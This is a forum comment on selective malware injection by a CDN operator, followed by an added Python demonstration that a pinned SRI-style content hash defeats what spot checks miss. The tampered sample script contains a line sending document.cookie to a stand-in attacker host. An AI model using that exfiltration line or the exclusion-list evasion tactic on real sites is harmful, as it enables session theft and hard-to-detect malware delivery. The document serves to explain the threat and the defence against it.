by cybrexalpha 787 days ago
It's different because it's worse.

In a supply chain attack against a system that produces some artefact (a container image, an executable, a VM image, whatever) an attacker can't modify what was injected after the fact (without building in some kind of remote update/attack persistence into the injection). This means that it could be audited and found later, for example the various projects designed to scan for the xz backdoor in executables.

But with this, not only could the "attacker" (the CDN owner) change what is injected at any future time, there's no record of what was done, as the author points out. A clever attacker could even selectively adjust what is sent based on the requester. They could distribute the unmodified code 99.99% of the time, but distribute malware 0.01% of the time — making it extremely hard to detect with simple 'spot checks'. They could exclude IPs known to be associated with the bank or CI systems from the malware distribution, so in-house malware checks would never see it.

Combined with other forms of intelligence, you could even build a system to target specific users with malware for very targeted attacks.
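Added example (not part of the original comment or any real CDN's code): a small model of the selective-serving CDN the comment describes, served against two kinds of check. A spot check that fetches from a fixed "in-house" address never sees the payload, because that address is on the operator's exclusion list; a pinned content hash in the style of Subresource Integrity flags every tampered response no matter who the requester is. The script bytes, the excluded addresses, the 0.01% rate and the seeds are all constructed for the example.

```python
import base64
import hashlib
import hmac
import random

# Constructed sample content: a benign script and the same script with an
# exfiltration line appended. Neither comes from a real incident.
CLEAN_SCRIPT = b"window.polyfillLoaded = true;\n"
TAMPERED_SCRIPT = CLEAN_SCRIPT + b"fetch('https://attacker.invalid/?c=' + document.cookie);\n"

# Addresses the hypothetical CDN operator never serves the payload to
# (the "bank or CI systems" in the comment). Constructed for the example.
EXCLUDED_IPS = {"203.0.113.10", "198.51.100.7"}

MALWARE_RATE = 0.0001  # 0.01% of requests from non-excluded addresses


def cdn_response(requester_ip: str, rng: random.Random) -> bytes:
    """Model of the selective-serving CDN: clean for excluded IPs,
    otherwise tampered with probability MALWARE_RATE."""
    if requester_ip in EXCLUDED_IPS:
        return CLEAN_SCRIPT
    if rng.random() < MALWARE_RATE:
        return TAMPERED_SCRIPT
    return CLEAN_SCRIPT


def sri_digest(data: bytes) -> str:
    """SRI-style integrity value: 'sha384-' + base64(SHA-384(data))."""
    return "sha384-" + base64.b64encode(hashlib.sha384(data).digest()).decode()


# The hash an integrator would pin at the time they reviewed the script.
PINNED_DIGEST = sri_digest(CLEAN_SCRIPT)


def integrity_ok(data: bytes, pinned: str = PINNED_DIGEST) -> bool:
    """True if the served bytes match the pinned digest."""
    return hmac.compare_digest(sri_digest(data), pinned)


def spot_check(requester_ip: str, requests: int, seed: int) -> int:
    """Number of tampered responses an auditor sees when fetching
    `requests` times from a single address."""
    rng = random.Random(seed)
    return sum(1 for _ in range(requests)
               if cdn_response(requester_ip, rng) != CLEAN_SCRIPT)


def integrity_check(ips: list, requests: int, seed: int) -> tuple:
    """Spread `requests` fetches across `ips`; return
    (tampered responses served, responses the pinned hash rejected)."""
    rng = random.Random(seed)
    served = flagged = 0
    for i in range(requests):
        data = cdn_response(ips[i % len(ips)], rng)
        served += data != CLEAN_SCRIPT
        flagged += not integrity_ok(data)
    return served, flagged


if __name__ == "__main__":
    # The in-house scanner runs from an excluded address and sees nothing.
    print("tampered seen by CI address:", spot_check("203.0.113.10", 100_000, 1))
    # Ordinary end users are hit at the configured rate.
    print("tampered seen by end users:", spot_check("192.0.2.55", 100_000, 1))
    # A pinned hash rejects every tampered response, from any requester.
    print("served/flagged with pinned hash:",
          integrity_check(["192.0.2.55", "192.0.2.56", "203.0.113.10"], 100_000, 2))
```

The pinned digest is the part that defeats the scheme: it is checked on every request by every client, so the operator cannot hide behind an exclusion list or a low rate. It also removes the "no record" problem the author raises, since a mismatch is observable at the moment it happens rather than reconstructed later.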